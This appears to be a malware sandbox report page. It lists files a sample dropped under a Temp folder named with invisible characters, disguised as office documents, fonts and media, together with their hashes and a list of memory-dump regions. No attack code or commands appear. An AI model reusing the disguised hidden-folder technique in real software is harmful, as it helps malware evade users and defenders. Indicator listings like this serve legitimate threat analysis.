178e131b67b9bffbae7e3311f3b0e9c19ca601f8654e19a79ec79585bba83325a4464978b78284288a6dc4d7e45a9060d906283e2be99b2c34a54e378c6bab17

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Desktop\UnpublishSuspend.xlsx

Filesize
16KB

MD5
d1404af3abd3a2a397f8cbb94af88e82

SHA1
42267c42bfe9878797220a230b943445a985a489

SHA256
9b7fc3ccaa2e8684949a7b2ea79b903bca9a289888a57e3c712c10cbde4f0e72

SHA512
34397755f8b5d80955e32e46c77860f2b2c9240b6735f29ec2f9b20151f64939155f68bb8b65ce1d725efc86d7d96c7961f4f8c491d1d6243045290b7357ffd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Documents\RedoResize.xlsx

Filesize
12KB

MD5
ec46e9d13396189e24a3a52649906314

SHA1
fe5290f5edb1b459691ee438bb713e9af632c337

SHA256
4afc69e312865b3eda57656278186161479c64d1a0af8d1b0dbc3b1bc8f2e784

SHA512
79874a898c5ccca8d2ae8457e029527e9021d1ce09cb21f0c5d067766e2c280fa7a45aaa4d17174b907e77c86e1dc63d3c6a37249fc654e827cc9d7d0f144d79

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Documents\StartCompare.pdf

Filesize
739KB

MD5
67f8e7a4aa899094a28acd285b91c1a6

SHA1
1a27ddb254e0b4f2e8f0078ff0f2942ff81bd449

SHA256
2eb6b9a87b8fed72da396d1073d64811ca2f159e92cb762b3ae9058bd938534e

SHA512
c1bd4140a52d27862fc398658975ff1ca6baedf84f1eb96b2e472f33ef4d5bd3e7958f8c18fb8c69fd7791e5459d454a2b880721dd55d8cca93d56612dbe7be1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Downloads\BackupAdd.ttc

Filesize
369KB

MD5
defb5eacf1f1133137c2eb034e9b2c85

SHA1
57d0eac3c9a8ee67ee03be0f6148e06965927b77

SHA256
f15af58c17e134b98083977814f7c5296ab93b8a9d382085a805538bb12b7df7

SHA512
db3fed4cf536ba3db6340deef45a715a49f6b9eacc9c7d73927d25109912bc4246c4a47770ff747c419410ce777b8e8eba043fcf61718c0442c6e325674f95cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Downloads\ConvertPing.xlsx

Filesize
541KB

MD5
ad31a7e69f29060d51609a400ddf1893

SHA1
1dca028fe3089fe8d2a487017f0aabf6f0cc785f

SHA256
5179a133980b73fca3cb399a9006311d30b84d5bbb440f5cc2dc5600d3f1a57f

SHA512
8cc740b209e595a4c3d690c6f4396c8d11bf4aaceaf8113e43f16857f669bf5b0ab9b3f066960dd5d6305d478c0c5c2ccf106d7923bf6af3a497279b2672243d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Music\DenyPublish.mp4

Filesize
658KB

MD5
085f007eddc2b8cc3aaac803ffd9e6e9

SHA1
e82f95cd4d06a76f945e339abf4acb154e69385f

SHA256
c53a2230b7b96fddd45bc0763ba0de2bcd285b43639a56750bd7bbb2c5ab631f

SHA512
c98de47ccc9c1d8ce25d7aac33fe5665bc5df8fd777b9527e247160f331ed825a21dfd6e4d98eeed34cae8988b987b025bfca4372791e478cdf185f0ac679f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Music\PopAssert.xls

Filesize
705KB

MD5
f99209feefe7389ef1388b2f631a17e6

SHA1
8cfbc5eb837d3adb005e1b78d644c63ccf8985a2

SHA256
4b2785edefb8bde47c4c8261499e6078da877e7bfebe79292b1c5dd595b7a133

SHA512
ed23107c38ffb09b4f499e84185533a720f6baeb808caccd66a4466bc14fb3459cd5443dc51dcfbc6e612bad04f328e16a7ab675f70a4948b702f7704fe98634

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Music\PublishRead.png

Filesize
822KB

MD5
b62634bd108fadecbb1ced7270b09e8a

SHA1
45ecfc23b41f09a6a59a3f6b13f8863e9cd9a80a

SHA256
d49be06d01a62dec4153893dd325cb170313d162bca7260b808e7e412bb59c7d

SHA512
2f4a49dcd51db5b2bbe21ad68db1984389e23ee2a0496ff00c7f0407b95b495522441797a74b8f0f879f48206fc9b97d3ca5bce33de035d6f741f453d190dfd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‎ \Common Files\Music\RestartPush.xlsx

Filesize
1.3MB

MD5
262ae6b50104be1df51e9466a436229d

SHA1
b2e01aef8610e87489ddd0750e33ebeb5248a2c1

SHA256
a82bab006c632ebf643aa73da59b8c4a89b36654434eca8715696a308309d33f

SHA512
a3af6488645d30c2f98ef9ce284b4694dd56b9497d04c8b1bf1a87f3e7a3aafbef7a4b60a952963dac8a37603ec5a1812468828add78c64422fd11ab2327324f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q0qazgkc\CSC7C94598F47E8409CB1927F2B8DBA2954.TMP

Filesize
652B

MD5
9d154c909f5f9601f94ad5188185b82f

SHA1
71c5b71b32e934a1579182d83f352f52db66c7bd

SHA256
587d0af77da7fa783b2c680ccc79bd8b0edcd95014d69614f27a81054270d590

SHA512
cea9826b1e25eb7018f123ecf825129575d4ef89b1ab2be26f4c0e94420a0e6a456ae4f2df218fa2913f87bd2f67c059d808cd1cbddef50479f217f7957085ef

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q0qazgkc\q0qazgkc.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q0qazgkc\q0qazgkc.cmdline

Filesize
607B

MD5
88124c148f00a6776de372bd8fe439cf

SHA1
e44028cec25af8ed6f390300e5af8cf56ca0c111

SHA256
ee300c87d98840f588e6f063ff89e98fefbd15825cdd4897e8a6a1d3bac8026c

SHA512
d7333edd770898097d8e6e53c1a512f04dfefabb00f557be4ab4523c497fc0fb9c81b7b14b46089c2e76f535e7a6481ea6de4be51979777682230c5ad468d935

Download Submit
memory/1264-56-0x00007FF9A8640000-0x00007FF9A8659000-memory.dmp

Filesize
100KB

Download
memory/1264-30-0x00007FF9A9350000-0x00007FF9A9377000-memory.dmp

Filesize
156KB

Download
memory/1264-296-0x00007FF9A9350000-0x00007FF9A9377000-memory.dmp

Filesize
156KB

Download
memory/1264-105-0x00007FF9A2FB0000-0x00007FF9A312F000-memory.dmp

Filesize
1.5MB

Download
memory/1264-297-0x00007FF9AAD90000-0x00007FF9AAD9F000-memory.dmp

Filesize
60KB

Download
memory/1264-79-0x00007FF9A9300000-0x00007FF9A930D000-memory.dmp

Filesize
52KB

Download
memory/1264-298-0x00007FF9A92A0000-0x00007FF9A92CB000-memory.dmp

Filesize
172KB

Download
memory/1264-81-0x00007FF9A8640000-0x00007FF9A8659000-memory.dmp

Filesize
100KB

Download
memory/1264-82-0x00007FF9A2B10000-0x00007FF9A2BC3000-memory.dmp

Filesize
716KB

Download
memory/1264-299-0x00007FF9A8640000-0x00007FF9A8659000-memory.dmp

Filesize
100KB

Download
memory/1264-70-0x00007FF991420000-0x00007FF991A83000-memory.dmp

Filesize
6.4MB

Download
memory/1264-73-0x000001C6887E0000-0x000001C688D13000-memory.dmp

Filesize
5.2MB

Download
memory/1264-74-0x00007FF9A9350000-0x00007FF9A9377000-memory.dmp

Filesize
156KB

Download
memory/1264-72-0x00007FF99FCD0000-0x00007FF9A0203000-memory.dmp

Filesize
5.2MB

Download
memory/1264-71-0x00007FF9A2D30000-0x00007FF9A2DFE000-memory.dmp

Filesize
824KB

Download
memory/1264-64-0x00007FF9A9340000-0x00007FF9A934D000-memory.dmp

Filesize
52KB

Download
memory/1264-66-0x00007FF9A35A0000-0x00007FF9A35D4000-memory.dmp

Filesize
208KB

Download
memory/1264-62-0x00007FF9A85F0000-0x00007FF9A8609000-memory.dmp

Filesize
100KB

Download
memory/1264-60-0x00007FF9A2FB0000-0x00007FF9A312F000-memory.dmp

Filesize
1.5MB

Download
memory/1264-58-0x00007FF9A8610000-0x00007FF9A8635000-memory.dmp

Filesize
148KB

Download
memory/1264-83-0x00007FF9A8610000-0x00007FF9A8635000-memory.dmp

Filesize
148KB

Download
memory/1264-54-0x00007FF9A92A0000-0x00007FF9A92CB000-memory.dmp

Filesize
172KB

Download
memory/1264-48-0x00007FF9AAD90000-0x00007FF9AAD9F000-memory.dmp

Filesize
60KB

Download
memory/1264-300-0x00007FF9A8610000-0x00007FF9A8635000-memory.dmp

Filesize
148KB

Download
memory/1264-253-0x00007FF9A35A0000-0x00007FF9A35D4000-memory.dmp

Filesize
208KB

Download
memory/1264-25-0x00007FF991420000-0x00007FF991A83000-memory.dmp

Filesize
6.4MB

Download
memory/1264-76-0x00007FF9A85D0000-0x00007FF9A85E4000-memory.dmp

Filesize
80KB

Download
memory/1264-78-0x00007FF9A92A0000-0x00007FF9A92CB000-memory.dmp

Filesize
172KB

Download
memory/1264-301-0x00007FF9A2FB0000-0x00007FF9A312F000-memory.dmp

Filesize
1.5MB

Download
memory/1264-260-0x00007FF9A2D30000-0x00007FF9A2DFE000-memory.dmp

Filesize
824KB

Download
memory/1264-261-0x00007FF99FCD0000-0x00007FF9A0203000-memory.dmp

Filesize
5.2MB

Download
memory/1264-271-0x000001C6887E0000-0x000001C688D13000-memory.dmp

Filesize
5.2MB

Download
memory/1264-281-0x00007FF991420000-0x00007FF991A83000-memory.dmp

Filesize
6.4MB

Download
memory/1264-305-0x00007FF9A2D30000-0x00007FF9A2DFE000-memory.dmp

Filesize
824KB

Download
memory/1264-309-0x00007FF9A9300000-0x00007FF9A930D000-memory.dmp

Filesize
52KB

Download
memory/1264-308-0x00007FF9A2B10000-0x00007FF9A2BC3000-memory.dmp

Filesize
716KB

Download
memory/1264-307-0x00007FF9A85D0000-0x00007FF9A85E4000-memory.dmp

Filesize
80KB

Download
memory/1264-306-0x00007FF99FCD0000-0x00007FF9A0203000-memory.dmp

Filesize
5.2MB

Download
memory/1264-304-0x00007FF9A35A0000-0x00007FF9A35D4000-memory.dmp

Filesize
208KB

Download
memory/1264-303-0x00007FF9A9340000-0x00007FF9A934D000-memory.dmp

Filesize
52KB

Download
memory/1264-302-0x00007FF9A85F0000-0x00007FF9A8609000-memory.dmp

Filesize
100KB

Download
memory/2796-96-0x000002D79DB20000-0x000002D79DB42000-memory.dmp

Filesize
136KB

Download
memory/2796-104-0x000002D79DEB0000-0x000002D79DFB2000-memory.dmp

Filesize
1.0MB

Download
memory/2796-100-0x000002D785730000-0x000002D785740000-memory.dmp

Filesize
64KB

Download
memory/2816-191-0x00000276B52A0000-0x00000276B52A8000-memory.dmp

Filesize
32KB

Download
memory/4592-84-0x00007FF990953000-0x00007FF990955000-memory.dmp

Filesize
8KB

Download
memory/4592-85-0x0000019D79130000-0x0000019D791B2000-memory.dmp

Filesize
520KB

Download